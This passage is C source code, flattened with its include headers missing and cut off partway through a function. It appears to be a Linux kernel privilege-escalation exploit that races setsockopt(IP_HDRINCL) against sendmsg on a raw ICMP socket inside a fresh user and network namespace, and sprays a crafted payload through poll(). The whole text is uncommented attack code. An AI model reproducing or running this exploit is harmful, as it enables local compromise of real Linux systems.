#define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #define CHKERR(cond,msg) if((cond)) { \ perror((msg)); \ } #define PSIZE 100 #define TIDSIZE 10000 pthread_t tid1[TIDSIZE]; pthread_t tid2[TIDSIZE]; int val0 = 0; struct msghdr *msg = NULL; struct sockaddr_in sin= {.sin_port = 0}; struct iovec iov[256]; int i; unsigned char buf[PSIZE]; char payload[2048]; int fdsock; void create_ns(void) { if(unshare(CLONE_NEWUSER) != 0) { perror("unshare(CLONE_NEWUSER)"); exit(1); } if(unshare(CLONE_NEWNET) != 0) { perror("unshared(CLONE_NEWUSER)"); exit(2); } } void *do_setsockopt_hdrincl(void *arg) { int err,val; val = *(int*)arg; err = setsockopt(fdsock,SOL_IP,IP_HDRINCL,&val,4); CHKERR(err,"setsockopt_int"); return NULL; } void do_poll(void) { poll((struct pollfd*)payload,256,0); } int create_socket(void) { int fd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP); CHKERR(fd < 0,"socket"); return fd; } struct msghdr *prepare_sendmsg(void) { struct msghdr *msg; int off = 156; memset(buf,0xcc,PSIZE); memset(payload,0x00,2048); memset(payload+off , 0x11,8); for(i=0;i<256;i++) { iov[i].iov_base = buf; iov[i].iov_len = PSIZE; } msg = malloc(sizeof(struct msghdr)); if(!msg) { perror("malloc"); exit(-1); } memset(msg,0,sizeof(struct msghdr)); memset(&sin,0,sizeof(sin)); msg->msg_name = &sin; msg->msg_namelen = sizeof(sin); msg->msg_iov = iov; msg->msg_iovlen = 256; msg->msg_control = NULL; msg->msg_controllen = 0; msg->msg_flags = 0; return msg; } void *do_sendmsg_for_race(void *arg) { int val = 1; int fd = *(int*)arg; setsockopt(fd,SOL_IP,IP_HDRINCL,&val,4); do_poll(); sendmsg(fd,msg,0); return NULL; } void racy(void) { int i; for(i=0;i